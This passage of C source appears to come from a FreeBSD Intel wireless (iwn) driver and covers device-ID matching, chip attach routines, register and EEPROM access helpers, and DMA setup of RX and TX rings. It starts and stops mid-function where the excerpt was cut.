(subdevice) \n", pid, sc->subdevice_id, sc->hw_type); return ENOTSUP; } break; /* 2x30 Series */ case IWN_DID_2x30_1: case IWN_DID_2x30_2: switch(sc->subdevice_id) { case IWN_SDID_2x30_1: case IWN_SDID_2x30_3: case IWN_SDID_2x30_5: //iwl100_bgn_cfg case IWN_SDID_2x30_2: case IWN_SDID_2x30_4: case IWN_SDID_2x30_6: //iwl100_bg_cfg sc->limits = &iwn2030_sensitivity_limits; sc->base_params = &iwn2030_base_params; sc->fwname = "iwn2030fw"; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 5x00 Series */ case IWN_DID_5x00_1: case IWN_DID_5x00_2: case IWN_DID_5x00_3: case IWN_DID_5x00_4: sc->limits = &iwn5000_sensitivity_limits; sc->base_params = &iwn5000_base_params; sc->fwname = "iwn5000fw"; switch(sc->subdevice_id) { case IWN_SDID_5x00_1: case IWN_SDID_5x00_2: case IWN_SDID_5x00_3: case IWN_SDID_5x00_4: case IWN_SDID_5x00_9: case IWN_SDID_5x00_10: case IWN_SDID_5x00_11: case IWN_SDID_5x00_12: case IWN_SDID_5x00_17: case IWN_SDID_5x00_18: case IWN_SDID_5x00_19: case IWN_SDID_5x00_20: //iwl5100_agn_cfg sc->txchainmask = IWN_ANT_B; sc->rxchainmask = IWN_ANT_AB; break; case IWN_SDID_5x00_5: case IWN_SDID_5x00_6: case IWN_SDID_5x00_13: case IWN_SDID_5x00_14: case IWN_SDID_5x00_21: case IWN_SDID_5x00_22: //iwl5100_bgn_cfg sc->txchainmask = IWN_ANT_B; sc->rxchainmask = IWN_ANT_AB; break; case IWN_SDID_5x00_7: case IWN_SDID_5x00_8: case IWN_SDID_5x00_15: case IWN_SDID_5x00_16: case IWN_SDID_5x00_23: case IWN_SDID_5x00_24: //iwl5100_abg_cfg sc->txchainmask = IWN_ANT_B; sc->rxchainmask = IWN_ANT_AB; break; case IWN_SDID_5x00_25: case IWN_SDID_5x00_26: case IWN_SDID_5x00_27: case IWN_SDID_5x00_28: case IWN_SDID_5x00_29: case IWN_SDID_5x00_30: case IWN_SDID_5x00_31: case IWN_SDID_5x00_32: case IWN_SDID_5x00_33: case IWN_SDID_5x00_34: case IWN_SDID_5x00_35: case IWN_SDID_5x00_36: //iwl5300_agn_cfg sc->txchainmask = IWN_ANT_ABC; sc->rxchainmask = IWN_ANT_ABC; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 5x50 Series */ case IWN_DID_5x50_1: case IWN_DID_5x50_2: case IWN_DID_5x50_3: case IWN_DID_5x50_4: sc->limits = &iwn5000_sensitivity_limits; sc->base_params = &iwn5000_base_params; sc->fwname = "iwn5000fw"; switch(sc->subdevice_id) { case IWN_SDID_5x50_1: case IWN_SDID_5x50_2: case IWN_SDID_5x50_3: //iwl5350_agn_cfg sc->limits = &iwn5000_sensitivity_limits; sc->base_params = &iwn5000_base_params; sc->fwname = "iwn5000fw"; break; case IWN_SDID_5x50_4: case IWN_SDID_5x50_5: case IWN_SDID_5x50_8: case IWN_SDID_5x50_9: case IWN_SDID_5x50_10: case IWN_SDID_5x50_11: //iwl5150_agn_cfg case IWN_SDID_5x50_6: case IWN_SDID_5x50_7: case IWN_SDID_5x50_12: case IWN_SDID_5x50_13: //iwl5150_abg_cfg sc->limits = &iwn5000_sensitivity_limits; sc->fwname = "iwn5150fw"; sc->base_params = &iwn_5x50_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id : 0x%04x" "rev 0x%08x not supported (device)\n", pid, sc->subdevice_id, sc->hw_type); return ENOTSUP; } return 0; } static int iwn4965_attach(struct iwn_softc *sc, uint16_t pid) { struct iwn_ops *ops = &sc->ops; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); ops->load_firmware = iwn4965_load_firmware; ops->read_eeprom = iwn4965_read_eeprom; ops->post_alive = iwn4965_post_alive; ops->nic_config = iwn4965_nic_config; ops->update_sched = iwn4965_update_sched; ops->get_temperature = iwn4965_get_temperature; ops->get_rssi = iwn4965_get_rssi; ops->set_txpower = iwn4965_set_txpower; ops->init_gains = iwn4965_init_gains; ops->set_gains = iwn4965_set_gains; ops->add_node = iwn4965_add_node; ops->tx_done = iwn4965_tx_done; ops->ampdu_tx_start = iwn4965_ampdu_tx_start; ops->ampdu_tx_stop = iwn4965_ampdu_tx_stop; sc->ntxqs = IWN4965_NTXQUEUES; sc->firstaggqueue = IWN4965_FIRSTAGGQUEUE; sc->ndmachnls = IWN4965_NDMACHNLS; sc->broadcast_id = IWN4965_ID_BROADCAST; sc->rxonsz = IWN4965_RXONSZ; sc->schedsz = IWN4965_SCHEDSZ; sc->fw_text_maxsz = IWN4965_FW_TEXT_MAXSZ; sc->fw_data_maxsz = IWN4965_FW_DATA_MAXSZ; sc->fwsz = IWN4965_FWSZ; sc->sched_txfact_addr = IWN4965_SCHED_TXFACT; sc->limits = &iwn4965_sensitivity_limits; sc->fwname = "iwn4965fw"; /* Override chains masks, ROM is known to be broken. */ sc->txchainmask = IWN_ANT_AB; sc->rxchainmask = IWN_ANT_ABC; /* Enable normal btcoex */ sc->sc_flags |= IWN_FLAG_BTCOEX; DPRINTF(sc, IWN_DEBUG_TRACE, "%s: end\n",__func__); return 0; } static int iwn5000_attach(struct iwn_softc *sc, uint16_t pid) { struct iwn_ops *ops = &sc->ops; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); ops->load_firmware = iwn5000_load_firmware; ops->read_eeprom = iwn5000_read_eeprom; ops->post_alive = iwn5000_post_alive; ops->nic_config = iwn5000_nic_config; ops->update_sched = iwn5000_update_sched; ops->get_temperature = iwn5000_get_temperature; ops->get_rssi = iwn5000_get_rssi; ops->set_txpower = iwn5000_set_txpower; ops->init_gains = iwn5000_init_gains; ops->set_gains = iwn5000_set_gains; ops->add_node = iwn5000_add_node; ops->tx_done = iwn5000_tx_done; ops->ampdu_tx_start = iwn5000_ampdu_tx_start; ops->ampdu_tx_stop = iwn5000_ampdu_tx_stop; sc->ntxqs = IWN5000_NTXQUEUES; sc->firstaggqueue = IWN5000_FIRSTAGGQUEUE; sc->ndmachnls = IWN5000_NDMACHNLS; sc->broadcast_id = IWN5000_ID_BROADCAST; sc->rxonsz = IWN5000_RXONSZ; sc->schedsz = IWN5000_SCHEDSZ; sc->fw_text_maxsz = IWN5000_FW_TEXT_MAXSZ; sc->fw_data_maxsz = IWN5000_FW_DATA_MAXSZ; sc->fwsz = IWN5000_FWSZ; sc->sched_txfact_addr = IWN5000_SCHED_TXFACT; sc->reset_noise_gain = IWN5000_PHY_CALIB_RESET_NOISE_GAIN; sc->noise_gain = IWN5000_PHY_CALIB_NOISE_GAIN; return 0; } /* * Attach the interface to 802.11 radiotap. */ static void iwn_radiotap_attach(struct iwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), IWN_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), IWN_RX_RADIOTAP_PRESENT); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } static void iwn_sysctlattach(struct iwn_softc *sc) { #ifdef IWN_DEBUG struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->sc_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->sc_dev); SYSCTL_ADD_INT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, sc->sc_debug, "control debugging printfs"); #endif } static struct ieee80211vap * iwn_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct iwn_vap *ivp; struct ieee80211vap *vap; uint8_t mac1[IEEE80211_ADDR_LEN]; struct iwn_softc *sc = ic->ic_ifp->if_softc; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; IEEE80211_ADDR_COPY(mac1, mac); ivp = (struct iwn_vap *) malloc(sizeof(struct iwn_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (ivp == NULL) return NULL; vap = &ivp->iv_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac1); ivp->ctx = IWN_RXON_BSS_CTX; IEEE80211_ADDR_COPY(ivp->macaddr, mac1); vap->iv_bmissthreshold = 10; /* override default */ /* Override with driver methods. */ ivp->iv_newstate = vap->iv_newstate; vap->iv_newstate = iwn_newstate; sc->ivap[IWN_RXON_BSS_CTX] = vap; ieee80211_ratectl_init(vap); /* Complete setup. */ ieee80211_vap_attach(vap, iwn_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void iwn_vap_delete(struct ieee80211vap *vap) { struct iwn_vap *ivp = IWN_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(ivp, M_80211_VAP); } static int iwn_detach(device_t dev) { struct iwn_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; int qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if (ifp != NULL) { ic = ifp->if_l2com; ieee80211_draintask(ic, &sc->sc_reinit_task); ieee80211_draintask(ic, &sc->sc_radioon_task); ieee80211_draintask(ic, &sc->sc_radiooff_task); iwn_stop(sc); callout_drain(&sc->watchdog_to); callout_drain(&sc->calib_to); ieee80211_ifdetach(ic); } /* Uninstall interrupt handler. */ if (sc->irq != NULL) { bus_teardown_intr(dev, sc->irq, sc->sc_ih); bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); pci_release_msi(dev); } /* Free DMA resources. */ iwn_free_rx_ring(sc, &sc->rxq); for (qid = 0; qid < sc->ntxqs; qid++) iwn_free_tx_ring(sc, &sc->txq[qid]); iwn_free_sched(sc); iwn_free_kw(sc); if (sc->ict != NULL) iwn_free_ict(sc); iwn_free_fwmem(sc); if (sc->mem != NULL) bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); if (ifp != NULL) if_free(ifp); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n", __func__); IWN_LOCK_DESTROY(sc); return 0; } static int iwn_shutdown(device_t dev) { struct iwn_softc *sc = device_get_softc(dev); iwn_stop(sc); return 0; } static int iwn_suspend(device_t dev) { struct iwn_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; ieee80211_suspend_all(ic); return 0; } static int iwn_resume(device_t dev) { struct iwn_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; /* Clear device-specific "PCI retry timeout" register (41h). */ pci_write_config(dev, 0x41, 0, 1); ieee80211_resume_all(ic); return 0; } static int iwn_nic_lock(struct iwn_softc *sc) { int ntries; /* Request exclusive access to NIC. */ IWN_SETBITS(sc, IWN_GP_CNTRL, IWN_GP_CNTRL_MAC_ACCESS_REQ); /* Spin until we actually get the lock. */ for (ntries = 0; ntries < 1000; ntries++) { if ((IWN_READ(sc, IWN_GP_CNTRL) & (IWN_GP_CNTRL_MAC_ACCESS_ENA | IWN_GP_CNTRL_SLEEP)) == IWN_GP_CNTRL_MAC_ACCESS_ENA) return 0; DELAY(10); } return ETIMEDOUT; } static __inline void iwn_nic_unlock(struct iwn_softc *sc) { IWN_CLRBITS(sc, IWN_GP_CNTRL, IWN_GP_CNTRL_MAC_ACCESS_REQ); } static __inline uint32_t iwn_prph_read(struct iwn_softc *sc, uint32_t addr) { IWN_WRITE(sc, IWN_PRPH_RADDR, IWN_PRPH_DWORD | addr); IWN_BARRIER_READ_WRITE(sc); return IWN_READ(sc, IWN_PRPH_RDATA); } static __inline void iwn_prph_write(struct iwn_softc *sc, uint32_t addr, uint32_t data) { IWN_WRITE(sc, IWN_PRPH_WADDR, IWN_PRPH_DWORD | addr); IWN_BARRIER_WRITE(sc); IWN_WRITE(sc, IWN_PRPH_WDATA, data); } static __inline void iwn_prph_setbits(struct iwn_softc *sc, uint32_t addr, uint32_t mask) { iwn_prph_write(sc, addr, iwn_prph_read(sc, addr) | mask); } static __inline void iwn_prph_clrbits(struct iwn_softc *sc, uint32_t addr, uint32_t mask) { iwn_prph_write(sc, addr, iwn_prph_read(sc, addr) & ~mask); } static __inline void iwn_prph_write_region_4(struct iwn_softc *sc, uint32_t addr, const uint32_t *data, int count) { for (; count > 0; count--, data++, addr += 4) iwn_prph_write(sc, addr, *data); } static __inline uint32_t iwn_mem_read(struct iwn_softc *sc, uint32_t addr) { IWN_WRITE(sc, IWN_MEM_RADDR, addr); IWN_BARRIER_READ_WRITE(sc); return IWN_READ(sc, IWN_MEM_RDATA); } static __inline void iwn_mem_write(struct iwn_softc *sc, uint32_t addr, uint32_t data) { IWN_WRITE(sc, IWN_MEM_WADDR, addr); IWN_BARRIER_WRITE(sc); IWN_WRITE(sc, IWN_MEM_WDATA, data); } static __inline void iwn_mem_write_2(struct iwn_softc *sc, uint32_t addr, uint16_t data) { uint32_t tmp; tmp = iwn_mem_read(sc, addr & ~3); if (addr & 3) tmp = (tmp & 0x0000ffff) | data << 16; else tmp = (tmp & 0xffff0000) | data; iwn_mem_write(sc, addr & ~3, tmp); } static __inline void iwn_mem_read_region_4(struct iwn_softc *sc, uint32_t addr, uint32_t *data, int count) { for (; count > 0; count--, addr += 4) *data++ = iwn_mem_read(sc, addr); } static __inline void iwn_mem_set_region_4(struct iwn_softc *sc, uint32_t addr, uint32_t val, int count) { for (; count > 0; count--, addr += 4) iwn_mem_write(sc, addr, val); } static int iwn_eeprom_lock(struct iwn_softc *sc) { int i, ntries; for (i = 0; i < 100; i++) { /* Request exclusive access to EEPROM. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_EEPROM_LOCKED); /* Spin until we actually get the lock. */ for (ntries = 0; ntries < 100; ntries++) { if (IWN_READ(sc, IWN_HW_IF_CONFIG) & IWN_HW_IF_CONFIG_EEPROM_LOCKED) return 0; DELAY(10); } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end timeout\n", __func__); return ETIMEDOUT; } static __inline void iwn_eeprom_unlock(struct iwn_softc *sc) { IWN_CLRBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_EEPROM_LOCKED); } /* * Initialize access by host to One Time Programmable ROM. * NB: This kind of ROM can be found on 1000 or 6000 Series only. */ static int iwn_init_otprom(struct iwn_softc *sc) { uint16_t prev, base, next; int count, error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Wait for clock stabilization before accessing prph. */ if ((error = iwn_clock_wait(sc)) != 0) return error; if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_setbits(sc, IWN_APMG_PS, IWN_APMG_PS_RESET_REQ); DELAY(5); iwn_prph_clrbits(sc, IWN_APMG_PS, IWN_APMG_PS_RESET_REQ); iwn_nic_unlock(sc); /* Set auto clock gate disable bit for HW with OTP shadow RAM. */ if (sc->base_params->shadow_ram_support) { IWN_SETBITS(sc, IWN_DBG_LINK_PWR_MGMT, IWN_RESET_LINK_PWR_MGMT_DIS); } IWN_CLRBITS(sc, IWN_EEPROM_GP, IWN_EEPROM_GP_IF_OWNER); /* Clear ECC status. */ IWN_SETBITS(sc, IWN_OTP_GP, IWN_OTP_GP_ECC_CORR_STTS | IWN_OTP_GP_ECC_UNCORR_STTS); /* * Find the block before last block (contains the EEPROM image) * for HW without OTP shadow RAM. */ if (! sc->base_params->shadow_ram_support) { /* Switch to absolute addressing mode. */ IWN_CLRBITS(sc, IWN_OTP_GP, IWN_OTP_GP_RELATIVE_ACCESS); base = prev = 0; for (count = 0; count < sc->base_params->max_ll_items; count++) { error = iwn_read_prom_data(sc, base, &next, 2); if (error != 0) return error; if (next == 0) /* End of linked-list. */ break; prev = base; base = le16toh(next); } if (count == 0 || count == sc->base_params->max_ll_items) return EIO; /* Skip "next" word. */ sc->prom_base = prev + 1; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); return 0; } static int iwn_read_prom_data(struct iwn_softc *sc, uint32_t addr, void *data, int count) { uint8_t *out = data; uint32_t val, tmp; int ntries; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); addr += sc->prom_base; for (; count > 0; count -= 2, addr++) { IWN_WRITE(sc, IWN_EEPROM, addr << 2); for (ntries = 0; ntries < 10; ntries++) { val = IWN_READ(sc, IWN_EEPROM); if (val & IWN_EEPROM_READ_VALID) break; DELAY(5); } if (ntries == 10) { device_printf(sc->sc_dev, "timeout reading ROM at 0x%x\n", addr); return ETIMEDOUT; } if (sc->sc_flags & IWN_FLAG_HAS_OTPROM) { /* OTPROM, check for ECC errors. */ tmp = IWN_READ(sc, IWN_OTP_GP); if (tmp & IWN_OTP_GP_ECC_UNCORR_STTS) { device_printf(sc->sc_dev, "OTPROM ECC error at 0x%x\n", addr); return EIO; } if (tmp & IWN_OTP_GP_ECC_CORR_STTS) { /* Correctable ECC error, clear bit. */ IWN_SETBITS(sc, IWN_OTP_GP, IWN_OTP_GP_ECC_CORR_STTS); } } *out++ = val >> 16; if (count > 1) *out++ = val >> 24; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); return 0; } static void iwn_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nsegs, int error) { if (error != 0) return; KASSERT(nsegs == 1, ("too many DMA segments, %d should be 1", nsegs)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int iwn_dma_contig_alloc(struct iwn_softc *sc, struct iwn_dma_info *dma, void **kvap, bus_size_t size, bus_size_t alignment) { int error; dma->tag = NULL; dma->size = size; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), alignment, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, BUS_DMA_NOWAIT, NULL, NULL, &dma->tag); if (error != 0) goto fail; error = bus_dmamem_alloc(dma->tag, (void **)&dma->vaddr, BUS_DMA_NOWAIT | BUS_DMA_ZERO | BUS_DMA_COHERENT, &dma->map); if (error != 0) goto fail; error = bus_dmamap_load(dma->tag, dma->map, dma->vaddr, size, iwn_dma_map_addr, &dma->paddr, BUS_DMA_NOWAIT); if (error != 0) goto fail; bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); if (kvap != NULL) *kvap = dma->vaddr; return 0; fail: iwn_dma_contig_free(dma); return error; } static void iwn_dma_contig_free(struct iwn_dma_info *dma) { if (dma->map != NULL) { if (dma->vaddr != NULL) { bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(dma->tag, dma->map); bus_dmamem_free(dma->tag, dma->vaddr, dma->map); dma->vaddr = NULL; } bus_dmamap_destroy(dma->tag, dma->map); dma->map = NULL; } if (dma->tag != NULL) { bus_dma_tag_destroy(dma->tag); dma->tag = NULL; } } static int iwn_alloc_sched(struct iwn_softc *sc) { /* TX scheduler rings must be aligned on a 1KB boundary. */ return iwn_dma_contig_alloc(sc, &sc->sched_dma, (void **)&sc->sched, sc->schedsz, 1024); } static void iwn_free_sched(struct iwn_softc *sc) { iwn_dma_contig_free(&sc->sched_dma); } static int iwn_alloc_kw(struct iwn_softc *sc) { /* "Keep Warm" page must be aligned on a 4KB boundary. */ return iwn_dma_contig_alloc(sc, &sc->kw_dma, NULL, 4096, 4096); } static void iwn_free_kw(struct iwn_softc *sc) { iwn_dma_contig_free(&sc->kw_dma); } static int iwn_alloc_ict(struct iwn_softc *sc) { /* ICT table must be aligned on a 4KB boundary. */ return iwn_dma_contig_alloc(sc, &sc->ict_dma, (void **)&sc->ict, IWN_ICT_SIZE, 4096); } static void iwn_free_ict(struct iwn_softc *sc) { iwn_dma_contig_free(&sc->ict_dma); } static int iwn_alloc_fwmem(struct iwn_softc *sc) { /* Must be aligned on a 16-byte boundary. */ return iwn_dma_contig_alloc(sc, &sc->fw_dma, NULL, sc->fwsz, 16); } static void iwn_free_fwmem(struct iwn_softc *sc) { iwn_dma_contig_free(&sc->fw_dma); } static int iwn_alloc_rx_ring(struct iwn_softc *sc, struct iwn_rx_ring *ring) { bus_size_t size; int i, error; ring->cur = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Allocate RX descriptors (256-byte aligned). */ size = IWN_RX_RING_COUNT * sizeof (uint32_t); error = iwn_dma_contig_alloc(sc, &ring->desc_dma, (void **)&ring->desc, size, 256); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate RX ring DMA memory, error %d\n", __func__, error); goto fail; } /* Allocate RX status area (16-byte aligned). */ error = iwn_dma_contig_alloc(sc, &ring->stat_dma, (void **)&ring->stat, sizeof (struct iwn_rx_status), 16); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate RX status DMA memory, error %d\n", __func__, error); goto fail; } /* Create RX buffer DMA tag. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, IWN_RBUF_SIZE, 1, IWN_RBUF_SIZE, BUS_DMA_NOWAIT, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "%s: could not create RX buf DMA tag, error %d\n", __func__, error); goto fail; } /* * Allocate and map RX buffers. */ for (i = 0; i < IWN_RX_RING_COUNT; i++) { struct iwn_rx_data *data = &ring->data[i]; bus_addr_t paddr; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "%s: could not create RX buf DMA map, error %d\n", __func__, error); goto fail; } data->m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, IWN_RBUF_SIZE); if (data->m == NULL) { device_printf(sc->sc_dev, "%s: could not allocate RX mbuf\n", __func__); error = ENOBUFS; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), IWN_RBUF_SIZE, iwn_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "%s: can't not map mbuf, error %d\n", __func__, error); goto fail; } /* Set physical address of RX buffer (256-byte aligned). */ ring->desc[i] = htole32(paddr >> 8); } bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; fail: iwn_free_rx_ring(sc, ring); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end in error\n",__func__); return error; } static void iwn_reset_rx_ring(struct iwn_softc *sc, struct iwn_rx_ring *ring) { int ntries; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (iwn_nic_lock(sc) == 0) { IWN_WRITE(sc, IWN_FH_RX_CONFIG, 0); for (ntries = 0; ntries < 1000; ntries++) { if (IWN_READ(sc, IWN_FH_RX_STATUS) & IWN_FH_RX_STATUS_IDLE) break; DELAY(10); } iwn_nic_unlock(sc); } ring->cur = 0; sc->last_rx_valid = 0; } static void iwn_free_rx_ring(struct iwn_softc *sc, struct iwn_rx_ring *ring) { int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s \n", __func__); iwn_dma_contig_free(&ring->desc_dma); iwn_dma_contig_free(&ring->stat_dma); for (i = 0; i < IWN_RX_RING_COUNT; i++) { struct iwn_rx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } if (ring->data_dmat != NULL) { bus_dma_tag_destroy(ring->data_dmat); ring->data_dmat = NULL; } } static int iwn_alloc_tx_ring(struct iwn_softc *sc, struct iwn_tx_ring *ring, int qid) { bus_addr_t paddr; bus_size_t size; int i, error; ring->qid = qid; ring->queued = 0; ring->cur = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Allocate TX descriptors (256-byte aligned). */ size = IWN_TX_RING_COUNT * sizeof (struct iwn_tx_desc); error = iwn_dma_contig_alloc(sc, &ring->desc_dma, (void **)&ring->desc, size, 256); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate TX ring DMA memory, error %d\n", __func__, error); goto fail; } size = IWN_TX_RING_COUNT * sizeof (struct iwn_tx_cmd); error = iwn_dma_contig_alloc(sc, &ring->cmd_dma, (void **)&ring->cmd, size, 4); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate TX cmd DMA memory, error %d\n", __func__, error); goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, IWN_MAX_SCATTER - 1, MCLBYTES, BUS_DMA_NOWAIT, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "%s: could not create TX buf DMA tag, error %d\n", __func__, error); goto fail; } paddr = ring->cmd_dma.paddr; for (i = 0; i < IWN_TX_RING_COUNT; i++) { struct iwn_tx_data *data = &ring->data[i]; data->cmd_paddr = paddr; data->scratch_paddr = paddr + 12; paddr += sizeof (struct iwn_tx_cmd); error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "%s: could not create TX buf DMA map, error %d\n", __func__, error); goto fail; } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); return 0; fail: iwn_free_tx_ring(sc, ring); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end in error\n", __func__); return error; } static void iwn_reset_tx_ring(struct iwn_softc *sc, struct iwn_tx_ring *ring) { int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->doing %s \n", __func__); for (i = 0; i < IWN_TX_RING_COUNT; i++) { struct iwn_tx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } } /* Clear TX descriptors. */ memset(ring->desc, 0, ring->desc_dma.size); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); sc->qfullmsk &= ~(1 << ring->qid); ring->queued = 0; ring->cur = 0; } static void iwn_free_tx_ring(struct iwn_softc *sc, struct iwn_tx_ring *ring) { int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s \n", __func__); iwn_dma_contig_free(&ring->desc_dma); iwn_dma_contig_free(&ring->cmd_dma); for (i = 0; i < IWN_TX_RING_COUNT; i++) { struct iwn_tx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } if (ring->data_dmat != NULL) { bus_dma_tag_destroy(ring->data_dmat); ring->data_dmat = NULL; } } static void iwn5000_ict_reset(struct iwn_softc *sc) { /* Disable interrupts. */ IWN_WRITE(sc, IWN_INT_MASK, 0); /* Reset ICT table. */ memset(sc->ict, 0, IWN_ICT_SIZE); sc->ict_cur = 0; /* Set physical address of ICT table (4KB aligned). */ DPRINTF(sc, IWN_DEBUG_RESET, "%s: enabling ICT\n", __func__); IWN_WRITE(sc, IWN_DRAM_INT_TBL, IWN_DRAM_INT_TBL_ENABLE | IWN_DRAM_INT_TBL_WRAP_CHECK | sc->ict_dma.paddr >> 12); /* Enable periodic RX interrupt. */ sc->int_mask |= IWN_INT_RX_PERIODIC; /* Switch to ICT interrupt mode in driver. */ sc->sc_flags |= IWN_FLAG_USE_ICT; /* Re-enable interrupts. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); } static int iwn_read_eeprom(struct iwn_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { struct iwn_ops *ops = &sc->ops; uint16_t val; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Check whether adapter has an EEPROM or an OTPROM. */ if (sc->hw_type >= IWN_HW_REV_TYPE_1000 && (IWN_READ(sc, IWN_OTP_GP) & IWN_OTP_GP_DEV_SEL_OTP)) sc->sc_flags |= IWN_FLAG_HAS_OTPROM; DPRINTF(sc, IWN_DEBUG_RESET, "%s found\n", (sc->sc_flags & IWN_FLAG_HAS_OTPROM) ? "OTPROM" : "EEPROM"); /* Adapter has to be powered on for EEPROM access to work. */ if ((error = iwn_apm_init(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not power ON adapter, error %d\n", __func__, error); return error; } if ((IWN_READ(sc, IWN_EEPROM_GP) & 0x7) == 0) { device_printf(sc->sc_dev, "%s: bad ROM signature\n", __func__); return EIO; } if ((error = iwn_eeprom_lock(sc)) != 0) { device_printf(sc->sc_dev, 